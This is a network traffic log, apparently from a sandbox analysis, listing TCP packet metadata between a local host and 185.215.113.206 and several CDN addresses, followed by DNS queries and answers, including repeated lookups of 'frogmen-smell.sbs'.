Nov 13, 2024 20:39:52.660855055 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660861969 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660873890 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660885096 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660885096 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660901070 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660909891 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660912991 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660924911 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660933971 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660943031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660954952 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660962105 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660965919 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660978079 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.660984993 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.660990000 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661009073 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661011934 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.661020041 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661031008 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661036968 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.661047935 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661051989 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.661060095 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661072016 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661078930 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.661084890 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661096096 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661103964 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.661113024 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661122084 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.661125898 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661139011 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661145926 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.661150932 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661164045 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661173105 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.661178112 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661189079 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.661190033 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661202908 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661211014 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.661294937 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.661657095 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661690950 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.661706924 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661720037 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661760092 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.661818027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661828995 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661840916 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661855936 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.661859989 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661871910 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661883116 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.661885977 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661895990 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.661906958 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.661923885 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.662014961 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.662026882 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.662039042 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.662051916 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.662060976 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.662075043 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.662098885 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.662209988 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.662241936 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.662250042 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.662283897 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.662457943 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.662471056 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.662483931 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.662494898 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.662503004 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.662532091 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.663494110 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.663567066 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.663577080 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.663598061 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.663620949 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.663639069 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.692257881 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.692323923 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.692346096 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.692413092 CET	49970	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.692414045 CET	49970	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.692960024 CET	49970	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.692969084 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.705776930 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.705878019 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.705903053 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.705915928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.705926895 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.705950975 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.705992937 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.706841946 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.706913948 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.733134985 CET	443	49976	23.222.241.134	192.168.2.5
Nov 13, 2024 20:39:52.733649969 CET	49976	443	192.168.2.5	23.222.241.134
Nov 13, 2024 20:39:52.733664036 CET	443	49976	23.222.241.134	192.168.2.5
Nov 13, 2024 20:39:52.737234116 CET	443	49976	23.222.241.134	192.168.2.5
Nov 13, 2024 20:39:52.737292051 CET	49976	443	192.168.2.5	23.222.241.134
Nov 13, 2024 20:39:52.737631083 CET	443	49975	23.222.241.134	192.168.2.5
Nov 13, 2024 20:39:52.738655090 CET	49976	443	192.168.2.5	23.222.241.134
Nov 13, 2024 20:39:52.738745928 CET	443	49976	23.222.241.134	192.168.2.5
Nov 13, 2024 20:39:52.739105940 CET	49975	443	192.168.2.5	23.222.241.134
Nov 13, 2024 20:39:52.739119053 CET	443	49975	23.222.241.134	192.168.2.5
Nov 13, 2024 20:39:52.740183115 CET	443	49975	23.222.241.134	192.168.2.5
Nov 13, 2024 20:39:52.740231991 CET	49975	443	192.168.2.5	23.222.241.134
Nov 13, 2024 20:39:52.742070913 CET	49975	443	192.168.2.5	23.222.241.134
Nov 13, 2024 20:39:52.742146969 CET	443	49975	23.222.241.134	192.168.2.5
Nov 13, 2024 20:39:52.749322891 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.749344110 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.749382019 CET	49973	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.749388933 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.749428988 CET	49973	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.773781061 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.773804903 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.773817062 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.773874998 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.773888111 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.773967028 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.773967028 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.773967028 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.774306059 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.774317980 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.774329901 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.774342060 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.774365902 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.774380922 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776218891 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776257992 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776271105 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776283979 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776312113 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776312113 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776315928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776329994 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776345015 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776370049 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776370049 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776391983 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776422024 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776434898 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776448011 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776459932 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776473045 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776485920 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776488066 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776499987 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776508093 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776544094 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776638985 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776649952 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776660919 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776674986 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776686907 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776695967 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776706934 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776710033 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776724100 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776731968 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776737928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776751995 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776755095 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776772022 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776794910 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776850939 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776864052 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776875973 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776890039 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776909113 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776910067 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776921034 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776946068 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776946068 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.776952982 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.776968002 CET	49873	80	192.168.2.5	185.215.113.206

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 13, 2024 20:39:28.267838955 CET	192.168.2.5	1.1.1.1	0xe3d9	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:28.268184900 CET	192.168.2.5	1.1.1.1	0x2b48	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 13, 2024 20:39:31.801414967 CET	192.168.2.5	1.1.1.1	0xfec0	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:31.801578999 CET	192.168.2.5	1.1.1.1	0xf502	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Nov 13, 2024 20:39:32.795757055 CET	192.168.2.5	1.1.1.1	0x4eb7	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:32.795949936 CET	192.168.2.5	1.1.1.1	0x8830	Standard query (0)	play.google.com	65	IN (0x0001)	false
Nov 13, 2024 20:39:38.801543951 CET	192.168.2.5	1.1.1.1	0x47f3	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:38.801701069 CET	192.168.2.5	1.1.1.1	0xf73d	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Nov 13, 2024 20:39:40.039957047 CET	192.168.2.5	1.1.1.1	0x52a8	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:40.042135954 CET	192.168.2.5	1.1.1.1	0x229b	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 13, 2024 20:39:41.420047045 CET	192.168.2.5	1.1.1.1	0x6690	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:41.420177937 CET	192.168.2.5	1.1.1.1	0xd9dc	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Nov 13, 2024 20:39:41.518964052 CET	192.168.2.5	1.1.1.1	0x6d4b	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:41.519392014 CET	192.168.2.5	1.1.1.1	0xe444	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Nov 13, 2024 20:39:41.552855968 CET	192.168.2.5	1.1.1.1	0x5956	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:41.553025007 CET	192.168.2.5	1.1.1.1	0x9d89	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Nov 13, 2024 20:39:41.562433958 CET	192.168.2.5	1.1.1.1	0xe774	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:41.562560081 CET	192.168.2.5	1.1.1.1	0x42e8	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Nov 13, 2024 20:39:41.568609953 CET	192.168.2.5	1.1.1.1	0x5299	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:41.568758011 CET	192.168.2.5	1.1.1.1	0xc37e	Standard query (0)	api.msn.com	65	IN (0x0001)	false
Nov 13, 2024 20:39:43.672190905 CET	192.168.2.5	1.1.1.1	0x1d23	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:43.672327995 CET	192.168.2.5	1.1.1.1	0x783d	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 13, 2024 20:39:43.672884941 CET	192.168.2.5	1.1.1.1	0xc6d1	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:43.673033953 CET	192.168.2.5	1.1.1.1	0x5412	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 13, 2024 20:39:43.697541952 CET	192.168.2.5	1.1.1.1	0xf2aa	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:43.697680950 CET	192.168.2.5	1.1.1.1	0x2a7	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 13, 2024 20:41:21.317878962 CET	192.168.2.5	1.1.1.1	0x8471	Standard query (0)	frogmen-smell.sbs	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:41:31.967569113 CET	192.168.2.5	1.1.1.1	0x2155	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:41:31.967691898 CET	192.168.2.5	1.1.1.1	0x8c9f	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 13, 2024 20:41:31.971508026 CET	192.168.2.5	1.1.1.1	0xbb21	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:41:31.971617937 CET	192.168.2.5	1.1.1.1	0x963b	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 13, 2024 20:41:31.971894979 CET	192.168.2.5	1.1.1.1	0x220c	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:41:31.971999884 CET	192.168.2.5	1.1.1.1	0x166c	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 13, 2024 20:41:59.696415901 CET	192.168.2.5	1.1.1.1	0x21a6	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:41:59.696551085 CET	192.168.2.5	1.1.1.1	0x9466	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 13, 2024 20:42:02.963409901 CET	192.168.2.5	1.1.1.1	0x13bf	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:02.963576078 CET	192.168.2.5	1.1.1.1	0xae6c	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 13, 2024 20:42:02.972867966 CET	192.168.2.5	1.1.1.1	0x882a	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:02.973088026 CET	192.168.2.5	1.1.1.1	0xe013	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 13, 2024 20:42:02.975389004 CET	192.168.2.5	1.1.1.1	0xbb8d	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:02.975512981 CET	192.168.2.5	1.1.1.1	0xf397	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 13, 2024 20:42:13.971033096 CET	192.168.2.5	1.1.1.1	0x7e88	Standard query (0)	frogmen-smell.sbs	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:30.937707901 CET	192.168.2.5	1.1.1.1	0x2ab0	Standard query (0)	frogmen-smell.sbs	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:50.091265917 CET	192.168.2.5	1.1.1.1	0x80da	Standard query (0)	frogmen-smell.sbs	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:43:12.981987000 CET	192.168.2.5	1.1.1.1	0xe8df	Standard query (0)	frogmen-smell.sbs	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:43:43.617849112 CET	192.168.2.5	1.1.1.1	0xf09e	Standard query (0)	frogmen-smell.sbs	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:44:22.309561014 CET	192.168.2.5	1.1.1.1	0x4088	Standard query (0)	frogmen-smell.sbs	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:44:43.958204031 CET	192.168.2.5	1.1.1.1	0x239b	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:44:43.958450079 CET	192.168.2.5	1.1.1.1	0xa042	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 13, 2024 20:39:28.276468039 CET	1.1.1.1	192.168.2.5	0x2b48	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 13, 2024 20:39:28.276504993 CET	1.1.1.1	192.168.2.5	0xe3d9	No error (0)	www.google.com		142.250.186.164	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:31.808778048 CET	1.1.1.1	192.168.2.5	0xfec0	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:31.808778048 CET	1.1.1.1	192.168.2.5	0xfec0	No error (0)	plus.l.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:31.811024904 CET	1.1.1.1	192.168.2.5	0xf502	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:32.803056955 CET	1.1.1.1	192.168.2.5	0x4eb7	No error (0)	play.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:38.808589935 CET	1.1.1.1	192.168.2.5	0x47f3	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:38.808898926 CET	1.1.1.1	192.168.2.5	0xf73d	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:38.811161041 CET	1.1.1.1	192.168.2.5	0x317e	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:38.811547041 CET	1.1.1.1	192.168.2.5	0xcdb5	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:38.811547041 CET	1.1.1.1	192.168.2.5	0xcdb5	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:40.046837091 CET	1.1.1.1	192.168.2.5	0x52a8	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:40.048907042 CET	1.1.1.1	192.168.2.5	0x229b	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:41.427409887 CET	1.1.1.1	192.168.2.5	0x6690	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:41.427409887 CET	1.1.1.1	192.168.2.5	0x6690	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.97	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:41.427745104 CET	1.1.1.1	192.168.2.5	0xd9dc	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:41.527065039 CET	1.1.1.1	192.168.2.5	0x6d4b	No error (0)	sb.scorecardresearch.com		18.65.39.56	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:41.527065039 CET	1.1.1.1	192.168.2.5	0x6d4b	No error (0)	sb.scorecardresearch.com		18.65.39.70	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:41.527065039 CET	1.1.1.1	192.168.2.5	0x6d4b	No error (0)	sb.scorecardresearch.com		18.65.39.28	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:41.527065039 CET	1.1.1.1	192.168.2.5	0x6d4b	No error (0)	sb.scorecardresearch.com		18.65.39.29	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:41.559954882 CET	1.1.1.1	192.168.2.5	0x5956	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:41.560816050 CET	1.1.1.1	192.168.2.5	0x9d89	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:41.569550991 CET	1.1.1.1	192.168.2.5	0xe774	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:41.570168018 CET	1.1.1.1	192.168.2.5	0x42e8	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:41.575956106 CET	1.1.1.1	192.168.2.5	0x5299	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:41.577266932 CET	1.1.1.1	192.168.2.5	0xc37e	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:43.522492886 CET	1.1.1.1	192.168.2.5	0xb2da	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:43.522492886 CET	1.1.1.1	192.168.2.5	0xb2da	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:43.679049969 CET	1.1.1.1	192.168.2.5	0x1d23	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:43.679049969 CET	1.1.1.1	192.168.2.5	0x1d23	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:43.679302931 CET	1.1.1.1	192.168.2.5	0x783d	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
